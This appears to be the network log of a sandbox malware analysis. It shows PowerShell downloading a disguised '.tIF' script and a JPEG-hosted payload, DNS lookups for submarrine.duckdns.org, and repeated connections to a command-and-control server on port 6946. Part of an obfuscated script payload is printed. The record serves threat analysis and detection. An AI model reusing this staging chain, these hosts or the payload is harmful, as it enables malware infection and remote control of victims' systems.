                                                                            Dec 17, 2024 07:22:32.874717951 CET498106946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:32.994497061 CET694649810192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:22:32.994704008 CET498106946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:32.998302937 CET498106946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:33.118129015 CET694649810192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:22:43.553205013 CET694649810192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:22:43.555999041 CET498106946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:43.556073904 CET498106946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:43.675688982 CET694649810192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:22:44.566157103 CET498386946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:44.686562061 CET694649838192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:22:44.686661959 CET498386946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:44.737773895 CET498386946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:44.857527971 CET694649838192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:22:55.211756945 CET694649838192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:22:55.211998940 CET498386946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:55.212044001 CET498386946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:55.331846952 CET694649838192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:22:56.548825979 CET498666946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:56.668581009 CET694649866192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:22:56.668663979 CET498666946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:56.672492981 CET498666946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:22:56.793382883 CET694649866192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:23:07.097498894 CET694649866192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:23:07.099862099 CET498666946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:07.099915981 CET498666946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:07.219805002 CET694649866192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:23:08.108776093 CET498926946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:08.228521109 CET694649892192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:23:08.228601933 CET498926946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:08.231439114 CET498926946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:08.351155043 CET694649892192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:23:18.583570957 CET694649892192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:23:18.583642006 CET498926946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:18.583705902 CET498926946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:18.703751087 CET694649892192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:23:19.600183964 CET499216946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:19.720077991 CET694649921192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:23:19.720410109 CET499216946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:19.723881960 CET499216946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:19.845050097 CET694649921192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:23:30.068531036 CET694649921192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:23:30.068736076 CET499216946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:30.068762064 CET499216946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:30.189439058 CET694649921192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:23:31.079588890 CET499496946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:31.200088978 CET694649949192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:23:31.200190067 CET499496946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:31.249351978 CET499496946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:31.369215012 CET694649949192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:23:41.749484062 CET694649949192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:23:41.749564886 CET499496946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:41.749638081 CET499496946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:41.869424105 CET694649949192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:23:42.765676022 CET499756946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:42.885493040 CET694649975192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:23:42.886895895 CET499756946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:42.893062115 CET499756946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:43.012794971 CET694649975192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:23:53.351787090 CET694649975192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:23:53.351952076 CET499756946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:53.351952076 CET499756946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:53.472076893 CET694649975192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:23:54.359220982 CET500046946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:54.479106903 CET694650004192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:23:54.479384899 CET500046946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:54.484339952 CET500046946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:23:54.604160070 CET694650004192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:24:04.909432888 CET694650004192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:24:04.909511089 CET500046946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:04.909562111 CET500046946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:05.029340029 CET694650004192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:24:06.228727102 CET500186946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:06.348537922 CET694650018192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:24:06.348624945 CET500186946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:06.351475954 CET500186946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:06.471175909 CET694650018192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:24:16.598633051 CET694650018192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:24:16.602389097 CET500186946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:16.602430105 CET500186946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:16.722261906 CET694650018192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:24:17.609440088 CET500196946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:17.729191065 CET694650019192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:24:17.729265928 CET500196946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:17.734155893 CET500196946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:17.894964933 CET694650019192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:24:28.163238049 CET694650019192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:24:28.166563988 CET500196946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:28.166621923 CET500196946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:28.286374092 CET694650019192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:24:29.171930075 CET500206946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:29.292191982 CET694650020192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:24:29.292409897 CET500206946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:29.297065020 CET500206946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:29.416843891 CET694650020192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:24:39.842847109 CET694650020192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:24:39.842936039 CET500206946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:39.842982054 CET500206946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:39.962889910 CET694650020192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:24:40.859230042 CET500216946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:40.979232073 CET694650021192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:24:40.979346037 CET500216946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:40.982772112 CET500216946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:41.102626085 CET694650021192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:24:51.460336924 CET694650021192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:24:51.460413933 CET500216946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:51.460447073 CET500216946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:51.583632946 CET694650021192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:24:52.468521118 CET500226946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:52.588766098 CET694650022192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:24:52.590620995 CET500226946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:52.655591011 CET500226946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:24:52.775398970 CET694650022192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:25:02.967382908 CET694650022192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:25:02.967463970 CET500226946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:25:02.967535973 CET500226946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:25:03.087404966 CET694650022192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:25:03.968878984 CET500236946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:25:04.088650942 CET694650023192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:25:04.089190006 CET500236946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:25:04.092689037 CET500236946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:25:04.212447882 CET694650023192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:25:14.601836920 CET694650023192.169.69.26192.168.2.4
                                                                            Dec 17, 2024 07:25:14.603910923 CET500236946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:25:14.604028940 CET500236946192.168.2.4192.169.69.26
                                                                            Dec 17, 2024 07:25:14.723658085 CET694650023192.169.69.26192.168.2.4
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 17, 2024 07:21:20.193627119 CET5819353192.168.2.41.1.1.1
                                                                            Dec 17, 2024 07:21:20.334589958 CET53581931.1.1.1192.168.2.4
                                                                            Dec 17, 2024 07:21:41.838119984 CET6140253192.168.2.41.1.1.1
                                                                            Dec 17, 2024 07:21:42.167356014 CET53614021.1.1.1192.168.2.4
                                                                            Dec 17, 2024 07:21:46.278347969 CET5376953192.168.2.41.1.1.1
                                                                            Dec 17, 2024 07:21:46.583339930 CET53537691.1.1.1192.168.2.4
                                                                            Dec 17, 2024 07:22:56.228671074 CET5004153192.168.2.41.1.1.1
                                                                            Dec 17, 2024 07:22:56.547521114 CET53500411.1.1.1192.168.2.4
                                                                            Dec 17, 2024 07:24:05.921394110 CET5532753192.168.2.41.1.1.1
                                                                            Dec 17, 2024 07:24:06.227881908 CET53553271.1.1.1192.168.2.4
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Dec 17, 2024 07:21:20.193627119 CET192.168.2.41.1.1.10xcb39Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                            Dec 17, 2024 07:21:41.838119984 CET192.168.2.41.1.1.10x72b0Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                            Dec 17, 2024 07:21:46.278347969 CET192.168.2.41.1.1.10xc9dbStandard query (0)submarrine.duckdns.orgA (IP address)IN (0x0001)false
                                                                            Dec 17, 2024 07:22:56.228671074 CET192.168.2.41.1.1.10xfb8cStandard query (0)submarrine.duckdns.orgA (IP address)IN (0x0001)false
                                                                            Dec 17, 2024 07:24:05.921394110 CET192.168.2.41.1.1.10xf72fStandard query (0)submarrine.duckdns.orgA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Dec 17, 2024 07:21:20.334589958 CET1.1.1.1192.168.2.40xcb39No error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 17, 2024 07:21:20.334589958 CET1.1.1.1192.168.2.40xcb39No error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                            Dec 17, 2024 07:21:20.334589958 CET1.1.1.1192.168.2.40xcb39No error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                            Dec 17, 2024 07:21:20.334589958 CET1.1.1.1192.168.2.40xcb39No error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                            Dec 17, 2024 07:21:20.334589958 CET1.1.1.1192.168.2.40xcb39No error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                            Dec 17, 2024 07:21:42.167356014 CET1.1.1.1192.168.2.40x72b0No error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                                            Dec 17, 2024 07:21:42.167356014 CET1.1.1.1192.168.2.40x72b0No error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                                            Dec 17, 2024 07:21:46.583339930 CET1.1.1.1192.168.2.40xc9dbNo error (0)submarrine.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                            Dec 17, 2024 07:22:56.547521114 CET1.1.1.1192.168.2.40xfb8cNo error (0)submarrine.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                            Dec 17, 2024 07:24:06.227881908 CET1.1.1.1192.168.2.40xf72fNo error (0)submarrine.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                            • res.cloudinary.com
                                                                            • paste.ee
                                                                            • 23.95.235.29
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.44973023.95.235.29802916C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 17, 2024 07:21:14.077642918 CET333OUTGET /439/weareusinggoodcompaniesforgifitingbesthingsformetoget.tIF HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                            Host: 23.95.235.29
                                                                            Connection: Keep-Alive
                                                                            Dec 17, 2024 07:21:15.185647011 CET1236INHTTP/1.1 200 OK
                                                                            Date: Tue, 17 Dec 2024 06:21:14 GMT
                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                            Last-Modified: Mon, 16 Dec 2024 06:33:21 GMT
                                                                            ETag: "25a36-6295d5b59e0d7"
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 154166
                                                                            Keep-Alive: timeout=5, max=100
                                                                            Connection: Keep-Alive
                                                                            Content-Type: image/tiff
                                                                            Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 4c 00 6c 00 4c 00 52 00 55 00 6c 00 4b 00 47 00 4c 00 57 00 69 00 4c 00 63 00 63 00 4b 00 20 00 3d 00 20 00 22 00 4b 00 72 00 63 00 4c 00 4f 00 6c 00 47 00 7a 00 50 00 4c 00 43 00 6b 00 5a 00 66 00 55 00 22 00 0d 00 0a 00 63 00 6c 00 6b 00 71 00 6b 00 74 00 57 00 47 00 6f 00 70 00 68 00 4e 00 4b 00 51 00 62 00 20 00 3d 00 20 00 22 00 48 00 50 00 41 00 61 00 5a 00 75 00 70 00 66 00 47 00 47 00 4b 00 66 00 6e 00 71 00 51 00 22 00 0d 00 0a 00 6d 00 69 00 71 00 4e 00 51 00 51 00 70 00 69 00 78 00 42 00 4c 00 42 00 4b 00 73 00 55 00 20 00 3d 00 20 00 22 00 63 00 66 00 65 00 6d 00 75 00 78 00 63 00 4c 00 4b 00 6d 00 70 00 41 00 71 00 4c 00 63 00 22 00 0d 00 0a 00 0d 00 0a 00 6b 00 65 00 63 00 4c 00 4e 00 57 00 4b 00 55 00 50 00 57 00 7a 00 73 00 4b 00 69 00 41 00 20 00 3d 00 20 00 22 00 54 00 55 00 64 00 6b 00 54 00 75 00 4c 00 48 00 66 00 7a 00 57 00 4b 00 4b 00 50 00 4c 00 22 00 0d 00 0a 00 7a 00 78 00 4b 00 63 00 5a 00 6b 00 55 00 4b 00 76 00 52 00 [TRUNCATED]
                                                                            Data Ascii: LlLRUlKGLWiLccK = "KrcLOlGzPLCkZfU"clkqktWGophNKQb = "HPAaZupfGGKfnqQ"miqNQQpixBLBKsU = "cfemuxcLKmpAqLc"kecLNWKUPWzsKiA = "TUdkTuLHfzWKKPL"zxKcZkUKvRqiGjZ = "fiLpWhhdcKUocKC"kciUWKHRqQJCPzx = "BdUifRfCPcfoPeG"GciWBptqkezgbbz = "uuZuRcRBULkpfKN"TmbNURWkZpIUKZL = "dzcfmkGfQnGnNLu"kJcQnceBoaqHZil = "WGaiWzWatRRLAfh"atGaoUpUuUflAiG = "UPcngWmLNGWWZSv"kgoBocqecrmeknc = "kHGCzHOaqbAchnb"tKPrLJoNimHmaho = "ipZROUCctukWOzm"eGBkUR
                                                                            Dec 17, 2024 07:21:15.185671091 CET1236INData Raw: 00 65 00 47 00 63 00 5a 00 73 00 6c 00 68 00 57 00 7a 00 20 00 3d 00 20 00 22 00 6e 00 70 00 41 00 61 00 4b 00 68 00 47 00 78 00 57 00 63 00 53 00 71 00 4c 00 63 00 66 00 22 00 0d 00 0a 00 63 00 70 00 65 00 4c 00 61 00 4c 00 69 00 57 00 72 00 53
                                                                            Data Ascii: eGcZslhWz = "npAaKhGxWcSqLcf"cpeLaLiWrSkedeK = "hiWLKGWpIPkCGrA"NNiQWWLZAJoqkfN = "WimLckqviWhLWze"icqdLzchKULece
                                                                            Dec 17, 2024 07:21:15.185687065 CET1236INData Raw: 00 69 00 50 00 57 00 57 00 5a 00 76 00 22 00 0d 00 0a 00 71 00 55 00 52 00 6d 00 70 00 47 00 69 00 5a 00 4b 00 53 00 75 00 69 00 6e 00 67 00 71 00 20 00 3d 00 20 00 22 00 57 00 6b 00 4c 00 4f 00 4b 00 70 00 75 00 71 00 68 00 4b 00 55 00 64 00 41
                                                                            Data Ascii: iPWWZv"qURmpGiZKSuingq = "WkLOKpuqhKUdAmG"veconkZZCLkIbdB = "KzdxCUKbfiAzGjG"PkcTRicWNWKpJiP = "LQaHWzhoWLlLfZP"J
                                                                            Dec 17, 2024 07:21:15.185703039 CET1236INData Raw: 00 64 00 57 00 20 00 3d 00 20 00 22 00 71 00 6f 00 73 00 47 00 57 00 42 00 51 00 4b 00 54 00 73 00 57 00 68 00 6c 00 42 00 43 00 22 00 0d 00 0a 00 63 00 78 00 47 00 43 00 4e 00 65 00 75 00 48 00 4a 00 7a 00 69 00 74 00 6d 00 4e 00 6e 00 20 00 3d
                                                                            Data Ascii: dW = "qosGWBQKTsWhlBC"cxGCNeuHJzitmNn = "roBiPiKUOhlocii"zppBRBHLPKvUUna = "GiccGUhBdGioWLU"geobzALcWicNdjO = "fGLZ
                                                                            Dec 17, 2024 07:21:15.185863018 CET1236INData Raw: 00 61 00 4c 00 4f 00 4c 00 4b 00 4c 00 4c 00 5a 00 57 00 6e 00 6c 00 5a 00 4c 00 4b 00 6d 00 20 00 3d 00 20 00 22 00 47 00 4b 00 7a 00 4b 00 41 00 4a 00 7a 00 6e 00 57 00 4c 00 55 00 66 00 71 00 6d 00 71 00 22 00 0d 00 0a 00 4c 00 57 00 4b 00 68
                                                                            Data Ascii: aLOLKLLZWnlZLKm = "GKzKAJznWLUfqmq"LWKhHbfLPpkHWJK = "WmhiucoWWWnlOaZ"IObkGWKrPZLkWNU = "mWLkNqGdKzLueLG"WUcqAhtG
                                                                            Dec 17, 2024 07:21:15.185878992 CET1236INData Raw: 00 57 00 68 00 4b 00 43 00 43 00 6c 00 6d 00 50 00 4b 00 52 00 63 00 4b 00 22 00 0d 00 0a 00 55 00 76 00 57 00 6d 00 6b 00 62 00 75 00 41 00 61 00 6c 00 4c 00 62 00 57 00 70 00 4c 00 20 00 3d 00 20 00 22 00 4b 00 4b 00 57 00 69 00 47 00 47 00 53
                                                                            Data Ascii: WhKCClmPKRcK"UvWmkbuAalLbWpL = "KKWiGGSBATLKuUW"fNRgWsLAKkLoWWn = "PnlkURiWuGNihit"hlLGjivLLqKAZSn = "lfqNPZKfWoAcL
                                                                            Dec 17, 2024 07:21:15.185894966 CET1236INData Raw: 00 7a 00 69 00 47 00 50 00 57 00 66 00 75 00 4c 00 20 00 3d 00 20 00 22 00 52 00 69 00 70 00 4b 00 57 00 4c 00 6e 00 62 00 43 00 65 00 66 00 6d 00 61 00 69 00 6b 00 22 00 0d 00 0a 00 61 00 49 00 57 00 74 00 69 00 64 00 51 00 76 00 70 00 51 00 57
                                                                            Data Ascii: ziGPWfuL = "RipKWLnbCefmaik"aIWtidQvpQWLuoZ = "bBtlsxPWenWfPLJ"UdbqhkCiRlWGJic = "kvALGCNKLkiNKTR"peezaizAbbkcAtK =
                                                                            Dec 17, 2024 07:21:15.185909986 CET1236INData Raw: 00 6b 00 63 00 4c 00 22 00 0d 00 0a 00 75 00 4c 00 74 00 4c 00 50 00 47 00 6b 00 65 00 6e 00 47 00 6e 00 66 00 5a 00 52 00 65 00 20 00 3d 00 20 00 22 00 64 00 57 00 54 00 50 00 4b 00 6b 00 6b 00 6c 00 4c 00 57 00 55 00 69 00 72 00 61 00 70 00 22
                                                                            Data Ascii: kcL"uLtLPGkenGnfZRe = "dWTPKkklLWUirap"tsujmkptKcHLKiN = "mGgRkiqkUpWzLZe"UxebnnjqdKaaiLW = "RQpcWeoLKbfohzW"nk
                                                                            Dec 17, 2024 07:21:15.185988903 CET1236INData Raw: 00 3d 00 20 00 22 00 42 00 5a 00 57 00 78 00 62 00 4f 00 4e 00 4c 00 70 00 50 00 4b 00 4b 00 6f 00 57 00 6c 00 22 00 0d 00 0a 00 4b 00 4a 00 57 00 71 00 4c 00 4b 00 63 00 55 00 55 00 63 00 70 00 63 00 41 00 66 00 50 00 20 00 3d 00 20 00 22 00 6b
                                                                            Data Ascii: = "BZWxbONLpPKKoWl"KJWqLKcUUcpcAfP = "kGzizUZecNpWlZk"GNLRiqeGGdZpeGN = "uWmnlGzaWUuLzph"iuqipUcLoqWUnoH = "choNOJh
                                                                            Dec 17, 2024 07:21:15.186005116 CET1236INData Raw: 00 4c 00 4e 00 47 00 66 00 6f 00 62 00 70 00 70 00 47 00 41 00 69 00 68 00 66 00 67 00 20 00 3d 00 20 00 22 00 47 00 55 00 70 00 4c 00 70 00 71 00 50 00 51 00 69 00 64 00 78 00 57 00 55 00 62 00 74 00 22 00 0d 00 0a 00 4c 00 75 00 75 00 57 00 4c
                                                                            Data Ascii: LNGfobppGAihfg = "GUpLpqPQidxWUbt"LuuWLsUtKdmiTPW = "cLhCaKLLiKolLIz"LmWJupHKoZqmZah = "LzbkahzsmoLIAok"WkPKBlGIBkt
                                                                            Dec 17, 2024 07:21:15.305649042 CET1236INData Raw: 00 6b 00 41 00 55 00 57 00 68 00 73 00 70 00 4f 00 47 00 22 00 0d 00 0a 00 52 00 4b 00 65 00 6f 00 64 00 4b 00 63 00 62 00 47 00 6b 00 51 00 6e 00 57 00 70 00 50 00 20 00 3d 00 20 00 22 00 6b 00 57 00 65 00 57 00 57 00 6e 00 41 00 69 00 4b 00 55
                                                                            Data Ascii: kAUWhspOG"RKeodKcbGkQnWpP = "kWeWWnAiKUNKcWo"UnoUeiCWqPWPcto = "ubLkqLaidLWoUdG"dKRJOkmNUbtGLxk = "WmRtWKRiLxWSWb


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.449731151.101.193.1374436312C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-17 06:21:21 UTC127OUTGET /dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg HTTP/1.1
                                                                            Host: res.cloudinary.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-17 06:21:22 UTC833INHTTP/1.1 200 OK
                                                                            Connection: close
                                                                            Content-Length: 2469849
                                                                            Content-Type: image/jpeg
                                                                            Etag: "78bd258abedd7787714b5d9c33eb9212"
                                                                            Last-Modified: Fri, 13 Dec 2024 00:49:52 GMT
                                                                            Date: Tue, 17 Dec 2024 06:21:21 GMT
                                                                            Strict-Transport-Security: max-age=604800
                                                                            Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                            Server-Timing: cld-fastly;dur=147;cpu=1;start=2024-12-17T06:21:21.838Z;desc=miss,rtt;dur=169,content-info;desc="width=1920,height=1080,bytes=2469849,format=\"jpg\",o=1,crt=1734050991,ef=(17)",cloudinary;dur=134;start=2024-12-17T06:21:21.845Z
                                                                            Server: Cloudinary
                                                                            Timing-Allow-Origin: *
                                                                            Access-Control-Allow-Origin: *
                                                                            Accept-Ranges: bytes
                                                                            X-Content-Type-Options: nosniff
                                                                            Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
                                                                            x-request-id: fdecdd9b808625f2ef998baba5084d1b
                                                                            2024-12-17 06:21:22 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                            Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                            2024-12-17 06:21:22 UTC1378INData Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                                            Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
